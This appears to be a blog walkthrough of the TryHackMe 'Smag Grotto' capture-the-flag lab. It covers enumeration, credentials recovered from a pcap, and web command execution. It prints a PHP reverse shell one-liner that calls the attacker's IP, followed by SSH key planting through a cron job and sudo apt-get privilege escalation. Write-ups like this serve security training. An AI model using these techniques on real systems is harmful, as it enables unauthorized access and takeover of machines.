Posts Tryhackme room - Smag Grotto Walkthrough
Post
Cancel

Tryhackme room - Smag Grotto Walkthrough

In this room, the credentials was contained in the .pcap files. The wireshark also contain a hostname that needed to access the login page. The hostname can be added into /etc/hosts with the MACHINE_IP.


The first enumeration that I do is running nmap scan where the nmap discover service SSH and HTTP.

1
2
3
4
5
6
7
8
9
10
11
12
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 74:e0:e1:b4:05:85:6a:15:68:7e:16:da:f2:c7:6b:ee (RSA)
|   256 bd:43:62:b9:a1:86:51:36:f8:c7:df:f9:0f:63:8f:a3 (ECDSA)
|   256 f9:e7:da:07:8f:10:af:97:0b:32:87:c9:32:d7:1b:76 (ED25519)
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Smag
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

After discovering there is HTTP service, I run gobuster scan to see what files and directories in the server.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.248.121/
[+] Threads:        64
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/26 09:41:30 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 200)
/mail (Status: 301)
/server-status (Status: 403)
===============================================================
2021/01/26 09:41:52 Finished
===============================================================

The index.php only contain “Welcome” sentence that didn’t have interesting information for us.

smag_grotto_1.png

But when visiting /mail directory, there is interesitng message where the developer post a .pcap file about the network.

smag_grotto_2.png

After inspecting the .pcap file, I found there is username and password that might be useful for us.

smag_grotto_3.png

From here, I try to search for page that used those credentials and didn’t find one. Then I inspecting the packet again and found there is a hostname.

smag_grotto_10.png

I added the hostname inside /etc/hosts with the MACHINE_IP, I found the login page when visiting the hostname.

smag_grotto_4.png

By using the credentials, I find the website allows us to execute command in the machine.

smag_grotto_5.png

I try to insert a reverse shell command like bash and python based on the gtfobins website, but it failed. I found the reverse shell that worked is the php command where it looks like this:

1
php -r '$sock=fsockopen("10.8.45.74",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

I then run netcat listener on port 8080 and run the command on the website where I got the reverse shell on the netcat listener.

smag_grotto_6.png

In the shell I run enumeration on the /home and /var/www/ directory and found nothing. Then I check the /opt/ directory where I find a hidden directory that contains public SSh key for user jake. When I check the /etc/crontab, I find that the content of /opt/.backups/jake_id_rsa.pub.backup will be cat into /home/jake/.ssh/authorized_keys.

smag_grotto_7.png

After generating our ssh key, I insert the public key into jake_id_rsa.pub.backup where it will insert our public key into the user jake. By doing this, I can login into user jake by using the private key.

smag_grotto_8.png

To privilege escalation, I run sudo -l to see if the user has sudo permissions on the machine. The user jake has sudo permission to run /usr/bin/apt-get. By knowing these, I can escalate our privilege by using the commands based on gtfobins reference.

smag_grotto_9.png